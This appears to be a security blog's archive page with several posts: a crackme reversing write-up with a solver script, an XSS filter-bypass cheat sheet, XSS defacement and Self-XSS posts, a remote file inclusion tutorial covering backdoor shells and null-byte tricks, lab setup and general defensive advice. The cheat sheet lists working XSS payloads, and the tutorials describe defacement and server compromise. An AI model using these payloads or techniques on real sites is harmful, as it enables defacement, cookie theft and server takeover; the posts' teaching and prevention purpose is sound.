Showing posts with label Ethical Hacking. Show all posts

Friday, June 21, 2013

Beating an SEH/VEH based Crack me through analysis

In this article, I will try to show how to beat an advanced crackme that uses an interesting way to calculate the input length and generates exceptions that must be handled in order to return values into 32-bit registers such as EAX. The key to beating a crackme is deep analysis of what it does under the hood, especially when it mixes methods to confuse, stop or slow the reverser.

This crackme was taken from a very popular challenge website that I will not mention; I edited the strings printed in the interface in memory so as not to reveal the website. I was also the 16th person to validate it (validation rate 1%).

Let's start by opening the crackme and see what it expects us to do!

It asks us politely to type a pass, or to crack it, I guess.

Open your mind and carry on. Now we need to take a quick look at which routines actually deal with the user input. Let's switch to Immunity and have a look.

You can see that it takes the user input, then calls an address held in the EBX register, and after that decides whether to print the success or the fail message. We are now interested in what happens directly after the user input is read with scanf, so let's see what EBX holds and step into that call.

EBX doesn't take us far, just a little below this code. The instructions EBX takes us to are the ones responsible for checking the user input and deciding whether it is right or not. The responsible routine is a little long and is split into 4 main parts, each ending with a JE (Jump if Equal) instruction. So let's take care of each part on its own:

1st Part – Checking the length :

Here are the instructions :

We can see that DEADBABE is added to 227A65DD, which leaves ESI holding the memory address of the user input; the next instruction then tries to set the Carry Flag, which is already set. The next instruction that may attract your attention is at address 00CC109D: this is the one that actually calculates the input string length. How did I know? I will explain.

You can see that the value 400 is moved into ECX; you can also notice that 227A69D9 is moved into EDI and EBX is then added to it, with the result of course stored in EDI. Before the ADD instruction we have a VERY important instruction, SALC, which sets AL to FF if CF is set or to 00 if CF is clear. In our case CF is set, so AL will be FF. This value matters because the SCASB instruction compares the byte at ES:[(E)DI] with AL, looking for bytes that don't match it. In addition, the REPE prefix accompanies the SCASB instruction, so ECX is used as the size of the search "array"; you can clearly see that ECX was set to 400.

Now go and check what EDI holds after the ADD instruction: you will see the value 00CC2497. Follow this value in the dump and you will find yourself in front of a bunch of "FF" bytes. ECX holds the value 400, which means the search array goes down to zero; in other words, in theory the search ends when ECX reaches 00000000. So the instruction searches for the first value different from "FF" starting from 00CC2497 until (00CC2497 – 400) = 00CC2097, and if no value different from FF is found, ECX simply ends up holding 00000000. When following 00CC2097 in the dump you will find the following:

Here, the REPE SCASB instruction stops at the last NULL byte highlighted in blue ("00") because it is different from "FF"; ECX will then hold the length from 00012097 up to the byte before the null byte. In my case (input 123456) ECX holds the value 9, because we begin counting from 0, then 1, then 2, until reaching 9, which means reaching 000120A0.

Now that we know how the length is calculated, we should figure out what length this crackme needs. In this phase we don't care whether the serial is right or not; we just want to get through the first condition correctly. You can see in the last two lines that 0F is subtracted from ECX, then the jump is taken if ZF=1 and not taken if ZF=0; in other words, if ECX = 00000000 after the subtraction ZF is set, otherwise it stays 0. So basically, after the REPE SCASB instruction ECX should hold 0F, which equals 15 in decimal. So we just need to enter a string of 12 characters and the jump will be taken.

2nd Part – First 4 bytes of the flag :

As the conditional jump was taken, you fall directly into the second instruction, LODS DWORD PTR DS:[ESI], which loads the DWORD at DS:[ESI] into the EAX register. This value is the first 4 characters of our flag as bytes, in little-endian order: if the first 4 characters you entered were 1234, then after this instruction EAX holds 34333231. After that we see that a DWORD is moved into EDX and EAX is XORed with it; this is almost the same case as the one I coded in CrackMe#3 for the Hackathon Challenge. The right value of EAX after XORing it with EDX should be 1608030E, so the first DWORD of our flag is 1608030E XORed with EDX, which gives: 1608030E XOR 5A643059 = 4C6C3357. You just have to convert it to big endian and you have the first 4 bytes of the flag: 57336C4C, which is "W3lL" in ASCII.

Now just type W3lL followed by 8 random characters and you will see that ZF is set after the compare and the jump is taken.

3rd part – Second 4 bytes of the flag (SEH) :
The first 2 parts were fun, now for more. Let's see the instructions:

Like the last part, we fall directly into the second instruction, which moves a DWORD from memory into the EBX register; after that 1000 is subtracted from EBX, which now holds 00CC1530. This address is the new address of the exception handler that is about to be set: EBX is pushed, then the new exception handler is fully registered by moving ESP into DWORD PTR FS:[0]. After that, the second 4 bytes of the user input are placed into the EAX register in little-endian format, then the value that will XOR EAX is moved into EBX.

Here is where the TRAP is: the "INT 1" instruction.

We can see here that if we step over this instruction using "F8", EIP jumps directly to the address 00CC10DF, so we must not step over this instruction but let the crackme run normally, as it would execute outside a debugger. Basically the INT 01 instruction is the single-step break: it runs after each instruction if the Trap Flag is set. Here, however, it is invoked directly inside the code while TF is clear, which generates an exception and never sets TF. Let me explain exactly what happens when the "INT 1" is passed through in normal execution rather than by single-stepping through it; keep in mind that this INT instruction generates an exception that will be handled by the newly created SEH. Basically, when we trigger this interrupt the processor goes to the 1st location in the Interrupt Vector Table, which starts at memory location 0x00 and ends at 0x3FF, simply because an interrupt number lies between 0 and 255. After that IP and CS are saved, which stores 4 bytes (IP = 2 bytes & CS = 2 bytes); before the interrupt hands the flow of execution back to the program, it returns using an "iret" instruction. Here is the IMPORTANT PART: CS:IP and all FLAGS are restored again.

So basically, when the instruction PUSH EBX at 00CC10C6 is executed it registers the current SE Handler, meaning the instructions that will deal with an exception. The exception here is triggered by the "INT 1" instruction and the execution flow moves directly to 00CC1530; after returning, the exception has been handled and execution continues normally. The only thing you need to do is set a breakpoint on the instruction after the "INT 1" instruction, because EIP will be incremented by 2 and that instruction will be skipped. After we return from the exception handling routine we will see that EAX holds a return value that has been ADDed to the previous value held by EAX.

Now let's work on finding that god damn second part of the validation flag. Pretend that I didn't say the return value stored in EAX is added to its previous value: after stepping over the "INT 1" you just see that the value of EAX changes. So we need to figure out whether a value has been moved into EAX, or added to or subtracted from it. To do this, let's rerun our crackme inside the debugger. Now we enter this input, for example: W3lL11119876. The DWORD treated in this part is 31313131 ("1111" in ASCII), so let's step over the LODSD instruction and you will see that EAX is now filled with 31313131. As I said previously, you have to set a bp at 00CC10DD and then step over it using <Shift + F8>, BUT we don't want to do that now, because this will change the value of EAX and we still need to figure out what arithmetic operation is done when the value returned by the interrupt is moved, added, subtracted or multiplied with the current value of EAX. So what I did is edit the value of EAX to NULL just before executing the interrupt, EAX = 00000000, so I don't need to brute-force each arithmetic operation: if it's an ADD, EAX will hold a value; if it's a multiplication EAX will still hold 0; a division gives either 0 or an exception... etc.

So, after executing the interrupt I realised that EAX holds the value 21486553; let's convert this to big endian and to ASCII because it's printable =) ... we finally get 53654821 = SeH!

If you want to be more sure that the operation is an addition, just go and change EAX to 00000001 and you will get 21486554, which in big endian + ASCII is: TeH!.

OK, so now that we know the value returned by the interrupt, we must find the right value EAX should hold before the XOR instruction. That's simple: we see that EAX is compared to 18D386D7 after being XORed, and it's XORed with 495F4265, so just before the XOR and just after "INT 1" EAX should hold 518CC4B2 (18D386D7 XOR 495F4265). Now we know what value EAX should hold just after the "INT 1" instruction, and we know that the interrupt adds 21486553 to the EAX register. Sooo the right value of EAX after the LODSD instruction is 518CC4B2 – 21486553 = 30445F5F, in big endian 5F5F4430 and in ASCII: __D0. So now the first 8 characters of the flag are W3lL__D0. Let's rerun the crackme and enter this serial: W3lL__D09876. By stepping through the instructions until the Jump if Equal in this part (don't forget the bp), you will see that ZF is set and the jump is taken, simply because the comparison was true and those 4 bytes are the correct ones.

4th part – The last 4 bytes of the flag (VEH) :
Here are the instructions :

We can see from a general view that these instructions build a Vectored Exception Handler (VEH) that deals with an exception by executing a routine at the instruction pointed to by EBX; pushing a nonzero second argument indicates that the VEH is inserted at the very head of the list. It is then removed after executing a bunch of instructions that check whether the last DWORD of the user input is correct; those instructions contain an exception at address

But first, what is a Vectored Exception Handler? According to MSDN:
– Vectored Exception Handling is new as of Windows XP.
– All information about VEHs is stored in the heap.
– Vectored exception handlers are explicitly added by your code, rather than as a byproduct of try/catch statements.
– Handlers aren't tied to a specific function, nor are they tied to a stack frame.

So basically, to be sure that an exception is triggered and dealt with, we have to put a breakpoint on the first instruction executed by the VEH, which is of course the address that was pushed from the EBX register. While running the code we see that the last DWORD is again loaded in little-endian format into the EAX register, then a value is moved into EBX, which is the value we will use for XORing. But right after this we have a MOV instruction that moves EBX into the DWORD at the memory location pointed to by EBP; when stopped on that instruction you will see that EBP holds the value 00000001, so an exception should be triggered, as it's impossible to write EBX to that location. If you put a bp on the EBX value pushed onto the stack, you will see that the execution flow is taken by the instructions at 00CC1960 (the pushed EBX, passed as an argument to create the VEH). Those routines handle this exception and also return a value in the EAX register, which is added just as happened in the previous part of checking the flag.

So we need to figure out that added value again. All we need to do is change the value of the EAX register after the LODSD instruction to 00000000, then put a breakpoint on 00CC110D and press "F9", so we don't skip that instruction as happened last time. Now all we have to do is look at what EAX holds: D9150F32. So after handling the exception this value (D9150F32) is added to the EAX register; now we need to figure out what the right value of EAX should be just after handling the exception, meaning (D9150F32 + LastFlagDwordLittleEndian).

You just have to XOR 8E7632F3 with EBX, and you get this value: FA3654A0. So the right last DWORD of the flag in little endian should be:

FA3654A0 – D9150F32 = 2121456E –> Big Endian = 6E452121 –> ASCII = nE!!

So the last 4 characters of the flag are : nE!! ...

5 – Regrouping the 3 parts :

So the complete flag to validate the challenge is: W3lL__D0nE!! Now just try to provide the flag to the crackme and you will see that:

Finally, this was a really GOOD crackme that I actually enjoyed discovering and cracking, because it uses several handlers to deal with exceptions and then return values that get added, and also uses a very interesting method to check the length.
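As an added example, not code from the original post or from the crackme itself, here is the arithmetic of the three checks carried through in Python using only the constants quoted above, plus a forward model of the checks to confirm that the recovered flag passes them. The part 4 EBX value is never stated on the page; the script derives it from the two values the page does give (the CMP target 8E7632F3 and the XOR result FA3654A0). The length check is modelled simply as "exactly 12 characters", the conclusion the write-up reaches, not the REPE SCASB scan itself.

```python
import struct

# Values transcribed from the write-up above (what the debugger showed at each compare).
PART2_TARGET, PART2_XOR_KEY = 0x1608030E, 0x5A643059                                  # CMP value, EDX
PART3_TARGET, PART3_XOR_KEY, PART3_HANDLER_ADD = 0x18D386D7, 0x495F4265, 0x21486553    # CMP value, EBX, SEH return
PART4_TARGET, PART4_XOR_RESULT, PART4_HANDLER_ADD = 0x8E7632F3, 0xFA3654A0, 0xD9150F32 # CMP value, target^EBX, VEH return
# The write-up gives the XOR result but not EBX itself for part 4; EBX follows from the two values it does give.
PART4_XOR_KEY = PART4_TARGET ^ PART4_XOR_RESULT   # derived, not quoted from the page: 0x74406653
FLAG_LENGTH = 12                                   # length the first check accepts, per the write-up

MASK32 = 0xFFFFFFFF


def dword_to_chars(value):
    """The 4 input characters that LODSD loads into EAX as this little-endian DWORD."""
    return struct.pack("<I", value & MASK32).decode("ascii")


def chars_to_dword(chars):
    """Inverse: what EAX holds after LODSD reads these 4 ASCII characters."""
    return struct.unpack("<I", chars.encode("ascii"))[0]


def part2_dword():
    """EAX ^ EDX == target  =>  EAX == target ^ EDX."""
    return (PART2_TARGET ^ PART2_XOR_KEY) & MASK32


def part3_dword():
    """((EAX + seh_return) ^ EBX) == target  =>  EAX == (target ^ EBX) - seh_return (mod 2^32)."""
    return ((PART3_TARGET ^ PART3_XOR_KEY) - PART3_HANDLER_ADD) & MASK32


def part4_dword():
    """((EAX + veh_return) ^ EBX) == target  =>  EAX == (target ^ EBX) - veh_return (mod 2^32)."""
    return ((PART4_TARGET ^ PART4_XOR_KEY) - PART4_HANDLER_ADD) & MASK32


def recover_flag():
    """Work the three checks backwards and glue the characters together."""
    return "".join(dword_to_chars(d) for d in (part2_dword(), part3_dword(), part4_dword()))


def check_flag(candidate):
    """Forward model of the four checks, in the order the crackme evaluates them."""
    if len(candidate) != FLAG_LENGTH or not candidate.isascii():
        return False
    d0, d1, d2 = (chars_to_dword(candidate[i:i + 4]) for i in (0, 4, 8))
    ok2 = (d0 ^ PART2_XOR_KEY) == PART2_TARGET
    ok3 = (((d1 + PART3_HANDLER_ADD) & MASK32) ^ PART3_XOR_KEY) == PART3_TARGET
    ok4 = (((d2 + PART4_HANDLER_ADD) & MASK32) ^ PART4_XOR_KEY) == PART4_TARGET
    return ok2 and ok3 and ok4


if __name__ == "__main__":
    for name, dword in (("part 2", part2_dword()), ("part 3", part3_dword()), ("part 4", part4_dword())):
        print(f"{name}: EAX after LODSD = {dword:08X} -> {dword_to_chars(dword)!r}")
    flag = recover_flag()
    print(f"flag = {flag!r}, passes forward checks: {check_flag(flag)}")
```

Each part is the same shape: the crackme compares f(EAX) with a constant, and because XOR is its own inverse and the handler's contribution is a plain 32-bit addition, f can be run backwards; the `& MASK32` keeps the subtraction in 32-bit register arithmetic.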

Author: This article was submitted by Souhail Hammou (Dark-Puzzle) from  You can follow him here: &


Wednesday, January 23, 2013

10 System Admin Tools to Help You Secure Your Network

System admins are frequently bombarded with security concerns, requests, alerts, news items, “did you see this?!” emails, and more. Keeping up with all the aspects of network security can seem like an overwhelming task, but in this post we’re going to look at ten tools a system admin can use to help secure their network. Some you may be familiar with, like network security software, while others may come as a surprise, like your email client; but all will help you to stay ahead of the bad guys, keep yourself informed of the latest threats, and maintain the security of your network.

1. Network security software
When we talk about network security software, we’re talking about a class of product more than any specific tool, and how important it is for you to have an application or small group of applications that can help you to accomplish most of your tasks. There are simply too many things for any one admin to do by hand, and network security software applications help to automate the heavy lifting and ensure that you can keep up with the workload. Look for network security software that multitasks. Think about it as a Swiss Army knife of software packages that includes many of the other items on this list.

2. Vulnerability scanner
A good vulnerability scanner is a key part of any toolkit, and should be used by server admins and security engineers alike. The top network security software apps will include a scanner that has a database of the thousands of vulnerabilities that could exist on your network, so that you can quickly, easily and regularly scan your network to ensure you systems are up-to-date, configured properly and secured.

3. Port scanner
A port scanner is another regular tool that should be in your network security software application. Attackers regularly scan your Internet connection looking for ways in and so should you. But you should also scan internally so you can find unauthorized services or misconfigured systems, and to validate your internal firewalls are set up correctly.

4. Patching software
Patching operating systems and third party applications is one of the most important, regularly recurring tasks a sys admin has. Network security software that can automate this, and handle the hundreds of other applications on your network, is the only realistic way you can keep up with this.

5. Auditing software
Auditing software may strike you as a strange recommendation at first, but consider all those apps you are trying to patch. How can you be sure you have no vulnerabilities on your systems if your users can install anything on your systems? How are you going to maintain licensing compliance if you don’t know who has installed what from \software? Network security software may also include software and hardware inventory components to help you stay informed and secure.

6. Secure remote clients
Telnet, older versions of PCAnyWhere and several of the web-based remote access apps that are out there all have a common issue - they’re not secure. Use SSH v2 or later for secure access to all CLI-based systems, and the most secure versions of Remote Desktop Protocol to manage Windows boxes. Using strong encryption, good passwords, lockout policies and, when possible, mutual authentication between client and host, will help to ensure no one sniffs credentials or brute-forces their way into a system. If you have two-factor authentication in your environment, ensure that every system possible uses it to further reduce your risk from unauthorized access.

7. A good network analyzer
Whether you like the open source Wireshark, the free Microsoft tool NetMon, or one of the many other commercial network analysis tools, having a good "sniffer" is key to helping secure and analyze systems. There is simply no more effective way to figure out just what is going on between networked systems than to see the traffic first hand.

8. Network tools
Whenever you are dealing with connections from foreign systems, you will find the need to check network addresses, routes and more. Having good tools like DIG, WHOIS, HOST, TCPING and others close at hand makes network evaluation a breeze.

9. Log parsing software
Securing systems means going through logs; lots of them. Web logs, access logs, system logs, security logs, SNMP logs, syslog logs – the list goes on and on. Having software that can quickly and easily parse through logs is critical. Everyone has their favorite. Some install locally like LogParser, while others run on servers like Splunk. Whichever you prefer, get a good log parser to help wade through what can be millions of entries quickly and easily so you can find events you need to check.

10. Your email client
Knowledge is power, and the best way to amass that knowledge is to stay informed. Whether you subscribe to email bulletins, security alerts, or RSS feeds, your email client can provide you the first indications that something new is out there, and also what you need to do to protect your systems from the threat. Zero day exploits, out of band patches, best practices and more, can all be yours if you simply join the right distribution lists and subscribe to the right lists.

These 10 system admin tools are a great start towards building your toolkit for security. Network security software plays a major role in this toolkit, which you supplement with other tools and the information you need to maintain a secure environment.

This guest post was provided by Emmanuel Carabott on behalf of GFI Software Ltd. Learn more about the importance of a secure business network by downloading the free eBook: A first aid kit for SysAdmins. All product and company names herein may be trademarks of their respective owners.

Tuesday, February 28, 2012

XSS attacks practical examples ~ Cross site Scripting Exploits

Hello BTS readers, so far I have explained XSS attacks and the risks of this vulnerability; I have also provided a guide to setting up your own pentesting lab (using DVWA) to practice XSS attacks.

DVWA is limited to a few XSS methods. You may be curious to see more practical examples of XSS attacks. eHackingNews will help you learn about the latest XSS attacks.

The XSS Vulnerability section of EhackingNews covers the latest XSS attacks submitted by security experts and greyhat hackers. This will give you an idea of what an XSS attack looks like.


Tuesday, February 7, 2012

Complete Cross site Scripting(XSS) cheat sheets : Part 1

I am providing this XSS cheat sheet after collecting the exploit codes from hackers' techniques and different sites, especially . This is a complete list of XSS cheat codes that will help you test for XSS vulnerabilities and is useful for bypassing filters. If you have any different cheat codes, please send them in.

Basic XSS codes:






When inside Script tag:
'; alert(1);

Bypassing with toggle case:
<IMG SRC=jAVasCrIPt:alert('XSS')>

XSS in Image and HTML tags:
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=javascript:alert('XSS')>

<img src=xss onerror=alert(1)>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav ascript:alert('XSS');">

<IMG SRC="jav&#x09;ascript:alert('XSS');">

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<BODY BACKGROUND="javascript:alert('XSS')">

<BODY ONLOAD=alert('XSS')>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"

<iframe src= <

Bypass the script tag filtering:






Using String.fromCharCode function:
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>


You can combine the above mentioned codes and make your own cheat code.

We are extending the cheat sheet.  Soon we will publish the part 2.
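As an added example (not from the original post or from the sites the cheat codes were collected from), the script below shows why the toggle-case and character-reference entries above get past a substring blacklist, and what the defender's fix looks like: contextual output encoding with Python's html.escape. The filter functions, the normalisation step and the list of sample payloads (three of them copied from the list above, one plain) are constructed for this illustration.

```python
import html
import re

# Sample input for the filters: three entries from the cheat sheet above plus the plain form.
SAMPLE_PAYLOADS = [
    "<IMG SRC=jAVasCrIPt:alert('XSS')>",                  # toggle case
    "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",       # tab inside the scheme as a character reference
    "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>",
    "<script>alert(1)</script>",                          # the literal most blacklists do catch
]

BANNED = ("<script", "javascript:", "onerror=")


def naive_blacklist_allows(payload):
    """A substring blacklist as many filters implement it: raw input against a few literals."""
    return not any(term in payload for term in BANNED)


def browser_normalise(payload):
    """Approximation of what the browser does before acting on an attribute value:
    decode character references, drop tabs/newlines inside the value, fold case."""
    decoded = html.unescape(payload)
    decoded = re.sub(r"[\t\n\r]", "", decoded)
    return decoded.lower()


def normalised_blacklist_allows(payload):
    """The same blacklist applied after normalisation. It catches the three bypasses
    above, but it is still a blacklist and still only as good as its term list."""
    return naive_blacklist_allows(browser_normalise(payload))


def render_comment(untrusted_text):
    """Defender's fix: encode for the HTML text context. The browser receives '&lt;' and
    '&gt;' and never parses the untrusted text as markup, whatever its case or encoding."""
    return '<p class="comment">' + html.escape(untrusted_text, quote=True) + "</p>"


def contains_markup(rendered):
    """True if any tag character survived encoding inside the fixed wrapper."""
    body = rendered[len('<p class="comment">'):-len("</p>")]
    return "<" in body or ">" in body


def evaluate_filters():
    """For each payload: (payload, naive filter lets it through, normalised filter lets
    it through, encoded output still contains markup)."""
    return [
        (p, naive_blacklist_allows(p), normalised_blacklist_allows(p), contains_markup(render_comment(p)))
        for p in SAMPLE_PAYLOADS
    ]


if __name__ == "__main__":
    for payload, naive_ok, norm_ok, markup in evaluate_filters():
        print(f"naive passes={naive_ok!s:5} normalised passes={norm_ok!s:5} "
              f"encoded output has markup={markup!s:5}  {payload[:44]}")
```

The point the cheat sheet makes implicitly: every blacklist is a race against the browser's own decoding rules, whereas encoding the output for the context it lands in is independent of how the input was spelled.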


Saturday, January 21, 2012

Complete Cross Site Scripting(XSS) Guide : Web Application Pen Testing

Hello BTS readers, here is the complete set of posts that explains everything about Cross site scripting. More articles are on the way; stay tuned to BreakTheSec!

Link To Tutorials:
PenTesting Lab to practice XSS attacks:

Saturday, December 31, 2011

How to deface website with Cross Site Scripting ? : Complete XSS Tutorial

This is my third article in the Cross site Scripting tutorial. Last time, I explained how to test for XSS vulnerabilities and some filter bypassing techniques. Now let us see how a hacker defaces a website through an XSS vulnerability.

Never implement this technique. I am just explaining it for educational purposes only.

Defacing is one of the most common things a hacker does after finding a vulnerability in a website. Defacing means replacing the website's content with the hacker's own content. Most of the time, attackers use this technique to inform the admin about the vulnerability. But it's a bad idea!

Script for changing the background color of a website:

Script for changing the background image of a website:

Defacement Page with Pastehtml:
First of all, upload a defacement page (HTML) to  and get the link.

When you find an XSS-vulnerable site, insert the script as:

This script will redirect the page to your pastehtml defacement page.

Note: You can deface only persistent XSS vulnerable sites.

Sunday, December 25, 2011

Set up your own Lab for practicing SQL injection and XSS : Ethical Hacking

I hope you have learned about SQL injection and XSS from BTS. But you may be curious to practice SQLi and XSS attacks. We know that attacking a third-party website is a crime. So how can we practice? Here is the solution for you, friends: why not set up your own web application? Yes, you can set up your own pen testing lab for practicing XSS and SQLi vulnerabilities.

While surfing the internet, I came across the "Damn Vulnerable Web App (DVWA)". It is a web application used for practicing your ethical hacking/pen testing skills in a legal way.

Download this web Application from here:

To install this application, you will need the XAMPP server.

The installation procedure :

Using this application , you can also practice:

  • LFI /RFI (File Inclusion methods)
  • Command Execution
  • Upload Script
  • Login Brute Force
If you have any doubts, check their wiki page or comment here.

Thursday, December 15, 2011

Introduction to Vulnerability Assessment

What is Vulnerability Assessment? 
Vulnerability Assessment is the process of identifying and classifying the vulnerabilities in a system. It is performed on various systems such as IT systems, nuclear power plants, water supply systems, etc. Vulnerability assessment from the perspective of disaster management means assessing the threats from potential hazards to the population and to infrastructure. It may be conducted in the political, social, economic or environmental fields.

The steps involved in Vulnerability Assessment:

  • Classifying capabilities and assets (resources) in a system.
  • Assigning quantifiable value and importance to those resources.
  • Identifying the vulnerabilities in each resource.
  • Mitigating or eliminating the most serious vulnerabilities for the most valuable resources.

Standard risk analysis is mostly interested in exploring and examining the risks surrounding a given asset or resource (in the IT industry's case, digital information, the continued smooth operation of a program, or the unimpeded performance of an OS or network) as well as its function and design. Such assessments tend to concentrate on the direct consequences and root causes for the failure of the scrutinized object.

In contrast, vulnerability assessment is more concerned with both the adverse effects on the asset itself and on the principal and secondary consequences for the surrounding system environment. At any rate, this analysis type is mostly focused on the possibilities of mitigating such risks and improving the security capacity and performance rating of a given network or computer system in order to better manage future incidents.

The vulnerability test is performed with automated tools (e.g. a Joomla vulnerability scanner). These tools identify the vulnerabilities and give tips for mitigating or patching them. But these tools are limited to common and known vulnerabilities. Vulnerability assessment can be done by in-house professionals (i.e. network administrators), but is usually outsourced to Managed Security Service Providers (MSSPs).

Wednesday, November 16, 2011

Self-XSS (Cross Site Scripting) ~ Social Engineering Attack and Prevention

Last time, I explained the Clickjacking attack and its prevention. Today, I am going to explain the Self-XSS (Cross Site Scripting) attack.

What is Self-XSS?
Self-XSS is a popular social engineering attack used by attackers to trick users into pasting malicious code into their browser. The result is that the attacker gains access to whatever website you visit. Usually scammers use this attack to trick users into buying products or to make money through online surveys.

Recently, hackers attacked Facebook with explicit hardcore porn images. Facebook says it might be a self-XSS attack.

JavaScript can be executed from the browser URL bar.
For example, enter the following code in your browser:
This will show a pop-up box with "BreakTheSecurity". An attacker can use this for malicious purposes: he can steal confidential data and cookies, redirect to malware sites and more.
For example:
Entering the following code will display the cookies in your browser:
javascript:alert("Cookies:"+document.cookie+"  "+"\n By \n BreakTheSecurity");

The above code does nothing malicious other than displaying the cookies. But an attacker can extend the script so that it takes advantage of your data.

Security Tips from BreakTheSecurity:
  • Use the NoScript add-on, which prevents JavaScript from running in your browser.
  • Don't click shortened URLs, for example: . They may redirect to infected sites.
Be aware of social engineering:
  • If anyone asks you (even if he is your friend) to paste scripts into the browser bar, never do it.
  • If anyone says "iPhone only $10", don't be eager to click it.
  • If anyone says "1000 shares will cure a baby", never fall for it. Facebook shares never help to get money or cure a baby.
  • Read our EHN spam report to know the latest updates about Facebook scams.
God gave us the sixth sense; use it and think before you click any link or follow other instructions.

Sunday, November 13, 2011

Remote File Inclusion Vulnerability Tutorial ~ Web application Vulnerability

Remote file inclusion (RFI) is a critical vulnerability caused by insufficient validation of user input passed to the web application. An RFI vulnerability allows attackers to load a remotely hosted malicious file, such as a backdoor shell.

Vulnerable Code
Let us say there is a webpage called "RFI.php" that loads code from an external file using the 'filename' parameter.

In the above screenshot, the RFI.php file loads the code from 'news.php'.

HTTP request:

Let us check the PHP code of RFI.php :

The include() function gets all the code/text from the specified file (news.php) and copies it into the current file (rfi.php).

Content of news.php file

As you can see, the developer didn't validate 'filename' and passed it directly to the 'include' function. This results in a Remote File Inclusion vulnerability.

Testing the Vulnerability:
Let us test whether the application is vulnerable to Remote File Inclusion by passing "" as the filename parameter to the webpage.

HTTP request:

Hurrah, it successfully loaded the content from :) It means the page is vulnerable to RFI :D

Exploiting the vulnerability:
A hacker with malicious intent can load a backdoor shell. The backdoor shell allows the hacker to compromise the entire web server.

For Example:

Using this shell, now an attacker is able to do anything in the server.  For instance, he can delete index.php file.

Example 2:

In most web applications, the filename is passed as a parameter without the extension (.php).

For example:

Code of RFI.php:
As you can see in the above code, the ".php" extension is appended to the filename in the PHP code.

So, if we pass "shell.txt", the filename becomes "shell.txt.php", which results in an error.

To avoid this error, you can use a null byte. The null byte (%00) indicates the end of the string; the characters following the null byte are ignored.

We can add a null byte at the end of our filename so that the ".php" string is ignored.


If you would like to test how a remote file inclusion attack works, you can download our vulnerable app "BTS Pentesting Lab" from here:

In case you would like to see real world examples, here is a list of vulnerability reports:

 How to Prevent Remote File Inclusion vulnerability
  • Disable the 'register_globals' and 'allow_url_fopen' and 'allow_url_include' in PHP.ini file.  In latest version of PHP, they have been turned off :) so no need to worry now.
  •  Validate Users' Input.

    Friday, November 11, 2011

    Shield Against Hacking With a Daily Anti-Malware Scan

    Hacking; it's the fear of every website owner and it keeps many online business owners up at night, checking their website and servers, making sure they are still in control. It's scary: one day you are doing well and selling products, the next you can't log into your website, you have profane images instead of product images, and you are spreading a virus that most search engines block and that most browsers will keep visitors from reaching. This can take years to recover from, even after the virus is gone, but there is hope. Malware often takes a while to really get into the system and cause damage, and as with a human virus, if it is stopped early you will not suffer these terrible effects.

    What is hacking?
    Hacking is a large culture with a large number of methods and attacks to get around your security, sneak into your website and server, and change everything around. There are many ways of doing this, but it is commonly done through malware that is designed to consume files and strike at an inopportune moment.

    The problem with this is that, until the virus strikes, you may not know anything is happening. Just like a human virus, it consumes files (like cells) and manifests its effects when it is already too late. By the time you notice that you cannot log in, or that weird things are happening on your website, it's already too late. You have been taken over, and there are many disastrous consequences.

    The most direct effect is that your website is ruined. Well, that can be fixed easily enough. The real trouble is your private information. Do you have any credit cards, passwords, private business files and other classified information that only you or other associates should see? Hacking is a common form of corporate espionage, which is why you may be targeted.

    If you have 10+ years in Internet security, maybe you can handle this by yourself; however, most website owners do not have this experience. Instead, you can use computer support Sydney daily malware scans. What does this do for you? Every day, the computer support Sydney company will scan all your website files for malware. Since malware typically needs several days or longer to really affect the website, this allows you to get rid of it before you see anything happen.

    Another benefit of a daily malware scan is that most of the infected code or files can be metaphorically sanitized, leaving you with a clean website free of digital germs. Not only that, but this malware scanner is updated daily with the new malware formats, methods and strategies that hackers think up. Think of it as a doctor who learns more and more about his field, only much faster.

    This can also easily scale up from beginner websites to enterprise-sized monoliths. So if you are worried about size, whether you have a small or a large website, don't let that be a concern. Your entire website can be easily scanned and searched for malware, which will then be promptly removed so you can enjoy the freedom of a clean website without viruses.

    No website, especially a business website, can live a successful online life without daily malware scanning. Hackers come in for fun to destroy websites with weak code, and corporate espionage will target any competitor that does not have appropriate online security. Don't be another hacked website; don't fall to this devastating online virus. Use a daily malware scanner, and keep those nasty germs away from your precious website.

    Jacob Pettit
    Marketing, GO8


    Tuesday, November 8, 2011

    DoS (denial of service) attack on Mobile phones

    As security professionals in a world shaped by information security, we have seen many kinds of DoS and DDoS attacks happening around the world, but what if someone DoSes your daily communication companion, your mobile device, and you are just unable to call or operate your phone properly, not even to listen to music or watch videos?

    Some years back, around 2003, a DoS was possible on a Nokia phone, but now there is a new way (at least I think so) of performing a DoS attack on a Samsung mobile phone, because of the auto call reject functionality of Samsung phones.

    Auto call reject functionality: this function of Samsung phones is used to block any number from calling you. When a person adds a number such as xxxxxxxxxx to the reject list and xxxxxxxxxx calls that person, the call is automatically disconnected, and that number xxxxxxxxxx cannot connect a call with you.

    Example: if Bob has a Samsung mobile phone and adds Mak's mobile number to his auto reject list, then when Mak calls Bob the call is disconnected on the first ring and Bob just gets a missed call alert of Mak's call.

    It's a nice function of Samsung mobile phones for blocking unwanted callers, but as the example shows, the rejection function rejects the call yet still shows a missed call alert for that blocked number. This is the main flaw (bug) which allows the DoS to happen on Samsung mobile phones.

